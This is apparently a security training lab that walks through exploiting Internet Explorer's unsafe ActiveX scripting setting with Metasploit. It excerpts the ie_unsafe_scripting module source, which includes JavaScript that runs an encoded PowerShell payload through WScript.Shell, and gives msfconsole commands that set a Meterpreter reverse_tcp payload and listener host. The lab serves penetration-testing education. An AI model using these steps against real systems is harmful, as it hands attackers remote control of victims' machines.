🚧 Exploiting IE Browser Vulnerability Using Metasploit

Introduction

In the past, web security has been compromised due to vulnerabilities in older versions of Microsoft's Internet Explorer (IE) browser. Users often failed to promptly apply security patches, and these potential security vulnerabilities were frequently exploited by hackers. This lab will demonstrate how to use Metasploit to exploit vulnerabilities in the IE browser.

Hackers exploited vulnerabilities in IE itself or software installed on IE, such as the notorious Flash Player, which was frequently targeted by hackers. After successfully attacking the IE browser, hackers would leverage web vulnerabilities to gain administrative privileges on the target machine.

In this lab, we will focus on using Metasploit to exploit vulnerabilities in the IE browser, enabling the attacker to gain control over the target system. The lab requires two machines, one running the vulnerable version of the IE browser and the other serving as the attack machine.

Note: The cloud machines used in this lab have a limited number of instances due to high configuration costs. Please ensure that you have enough time available before launching the lab environment to avoid wasting instances.

Introduction to IE Browser and Metasploit

In this step, we will introduce some background knowledge related to the lab.

Internet Explorer (IE) Browser

Internet Explorer (IE) is a web browser developed by Microsoft. Before IE7, its Chinese name was "Internet Explorer" (网络探路者). From IE7 onwards, its official name became "IE Browser."

Before proceeding with the lab, let's understand what ActiveX is. ActiveX refers to a set of strategic object-oriented technologies and tools from Microsoft, with the Component Object Model (COM) being the primary technology.

In a broader sense, ActiveX refers to Microsoft's entire COM architecture. However, it is commonly used to refer to ActiveX controls that implement object linking and embedding (OLE) based on COM interfaces. By defining interfaces between containers and components, if a control adheres to these specifications, it can be easily used across various containers without modifying the control's code.

Some browsers, such as IE and Netscape, support the use of ActiveX controls to varying degrees. This allows web pages to interact with scripts and controls, resulting in rich effects. However, it also introduces security concerns.

Metasploit Framework

The Metasploit project aims to provide information about security vulnerabilities and assist security engineers in penetration testing and developing intrusion detection system signatures. The most well-known sub-project of the Metasploit project is the open-source Metasploit framework, a tool for developing and executing exploit code against remote hosts.

In the environment preparation step (Step 2) of the previous section, we launched the Kali Linux container. Now, we will open the msfconsole in the Kali terminal to start the Metasploit framework:

## Start the PostgreSQL service
service postgresql start

## Initialize the database
msfdb init

## Start msfconsole (if an error occurs, wait for some time and try again)
msfconsole

If everything goes smoothly, you should see the following screen:

## Sample output of msfconsole

Vulnerability in IE Browser

Generally, after scanning a target host, we analyze the collected information to determine if any vulnerabilities can be exploited. Information about these vulnerabilities can be found on various information security forums, such as Vulnerability Box (漏洞盒子) and WooYun (乌云) in China.

Next, you can use the search command in Metasploit to check if there are any corresponding exploit modules available. These tool modules have been integrated into Metasploit, and you only need to learn how to set a few simple parameters to use them.

In this lab, we will exploit the "Unsafe Scripting Misconfiguration" vulnerability in IE. The attack process involves starting msfconsole, using the ie_unsafe_scripting script module, setting the local host IP address parameter, and running the exploit command.

Metasploit will then generate a web page URL. If the target machine's IE browser with the vulnerability visits this URL, the attacker can gain a shell connection between the attack machine and the target machine due to the ActiveX flaw, allowing the attacker to gain administrative privileges on the target machine.

Note that the "Initialize and script ActiveX controls not marked as safe" option in the target machine's IE browser must be enabled for the attack to be successful.

Exploiting the IE Browser Vulnerability

In this step, we will demonstrate the process of exploiting the IE browser vulnerability.

Understanding the Ruby Module Source Code

The exploit module ie_unsafe_scripting is already integrated into Metasploit. You can find its information using the search command (note that searching for modules in Metasploit may take two to three minutes due to the large number of modules, so please be patient):

## Search for the corresponding module information
msf > search ie_unsafe_scripting

## Sample output of the search command

You can view the source code of ie_unsafe_scripting using the cat command. Metasploit's exploit modules are written in Ruby language. The key parts of the source code for exploiting the IE vulnerability are shown below:

## Import required modules
require 'msf/core'
require 'msf/util/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote

  Rank = ManualRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::EXE
  include Msf::Exploit::Powershell

  ## Information related to instantiating ActiveXObject
  VULN_CHECK_JS = %Q|
    try {
      new ActiveXObject("WScript.Shell");
      new ActiveXObject("Scripting.FileSystemObject");
      is_vuln = true;
    } catch(e) {}
  |
...
...
...

## Initialize related information using the initialize function
def initialize(info = {})
    super(update_info(info,

      ## Module name
      'Name'                  => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration',

      ## Module description (omitted due to length)
      'Description'           => %q{
        ...
        ...
        ...
      },

      ## Module license
      'License'               => MSF_LICENSE,

      ## Module authors
      'Author'                =>
        [
          'natron',
          'Ben Campbell' ## PSH and remove ADODB.Stream
        ],
        'References'          =>
        [
          [ 'URL', 'http://support.microsoft.com/kb/182569' ],
          [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
          [ 'URL', 'http://support.microsoft.com/kb/870669']
        ],
        'DisclosureDate'      => 'Sep 20 2010',
        'Platform'            => 'win',

        ## Browser information description
        'BrowserRequirements' => {
          source:          'script',
          os_name:         OperatingSystems::Match::WINDOWS,
          ua_name:         HttpClients::IE,
          vuln_test:       VULN_CHECK_JS,
          vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.'
        },
        'Arch'                => ARCH_X86,

        ## Target Windows x86/x64 operating systems
        'Targets'             =>
          [
            [ 'Windows x86/x64', {} ]
          ],

        ## Default options
        'DefaultOptions'      =>
          {
            'HTTP::compression' => 'gzip'
          },
        'DefaultTarget'  => 0
      ))

    ## Register options and related registration functions
    register_options(
        [
           OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]),
           OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']])
        ], self.class
    )
  end

Continuing from the above Ruby source code, this part shows the middle section of the ie_unsafe_scripting source code:

  ## on_request_exploit function for listening to attack requests
  ## After generating a specific link, it listens for the target machine's IE browser to access the generated page
  def on_request_exploit(cli, request, browser)
    if has_protected_mode_prompt?(browser)
      print_warning("This target possibly has Protected Mode, exploit aborted.")
      send_not_found(cli)
      return
    end

    ## Build the attack page for the target machine to access
    var_shellobj = rand_text_alpha(rand(5)+5)

    p = regenerate_payload(cli)
    if datastore['TECHNIQUE'] == 'VBS'
      js_content = vbs_technique(var_shellobj, p)
    else
      js_content = psh_technique(var_shellobj, p)
    end

    print_status("Request received for #{request.uri}")
    print_status("Sending exploit html/javascript");

    ## Send the response to the client
    send_response(cli, js_content, { 'Content-Type' => 'text/html' })

    ## Handle the specific payload
    handler(cli)
  end
...
...
...
  ## Part of the generated JavaScript
  def psh_technique(var_shellobj, p)
    cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
    js_content = %Q|
<html><head></head><body><script>

## Instantiate ActiveXObject and return a reference to the Automation object
var #{var_shellobj} = new ActiveXObject("WScript.Shell");

## Run the run function to execute cmd commands
#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
</script></html>
|
    js_content
  end

Using Metasploit to Attack

After explaining the key parts of the ie_unsafe_scripting exploit module's source code, we will use the ie_unsafe_scripting module to launch the attack. First, in the msfconsole, use the use command to load the exploit module:

## Use the integrated exploit module
msf > use exploit/windows/browser/ie_unsafe_scripting

## Sample output of using the exploit module

Next, use the set command to set the attack payload, and the show options command to view the required options. Finally, use the set command to set the attack machine's IP address:

## Set the attack payload
msf > set payload windows/meterpreter/reverse_tcp

## View the option information
msf > show options

## Set the host IP address
msf > set LHOST 172.17.0.1

## Sample output of setting options

Then, enter the final exploit command to initiate the attack. The attack machine will enter a listening state, and if the target machine's vulnerable IE browser visits the generated web page, the attacker can gain administrative privileges on the target machine due to the ActiveX flaw and establish a shell connection:

## Sample output of the exploit command

## Generated web page URL
http://10.111.80.66:8080/gV9pr8k3POj

Note: Since the --network parameter was used when launching the container, the local IP address used in different lab environments may vary. Please refer to the URL generated in your own environment.

## Sample output showing the server entering a listening state

After launching, the server enters a listening state. However, since the LabEx environment does not have a Windows environment installed, the final step of using the IE browser to access the generated URL cannot be demonstrated.

Summary

In this lab, we learned how to use Metasploit to exploit vulnerabilities in the IE browser. The background knowledge section introduced what ActiveX is and its role in the IE browser. We then explained the key parts of the ie_unsafe_scripting exploit module's Ruby source code and demonstrated its basic usage in msfconsole. Although we could not demonstrate the part involving the target machine's IE browser, we provided a detailed explanation of the steps required.

Through this lab, you should have gained an understanding of the following:

• Basic Linux operations
• Basic usage of Metasploit
• Knowledge about IE browser vulnerabilities
• Understanding of the Ruby source code for the exploit module